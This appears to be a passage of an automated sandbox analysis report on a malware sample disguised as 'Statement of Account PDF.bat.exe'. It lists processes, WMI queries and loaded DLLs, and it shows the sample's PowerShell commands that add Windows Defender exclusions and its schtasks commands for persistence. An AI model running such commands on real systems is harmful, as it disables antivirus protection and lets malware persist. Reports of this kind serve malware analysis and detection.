                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Statement of Account PDF.bat.exeReversingLabs: Detection: 47%
                      Source: Statement of Account PDF.bat.exeVirustotal: Detection: 56%
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeFile read: C:\Users\user\Desktop\Statement of Account PDF.bat.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Statement of Account PDF.bat.exe "C:\Users\user\Desktop\Statement of Account PDF.bat.exe"
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Users\user\Desktop\Statement of Account PDF.bat.exe "C:\Users\user\Desktop\Statement of Account PDF.bat.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp216B.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess created: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess created: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 1816
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp44D2.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8032 -s 1828
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp6598.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7400 -s 1788
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Users\user\Desktop\Statement of Account PDF.bat.exe "C:\Users\user\Desktop\Statement of Account PDF.bat.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp216B.tmp"
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess created: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess created: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp44D2.tmp"
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp6598.tmp"
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeSection loaded: textshaping.dll
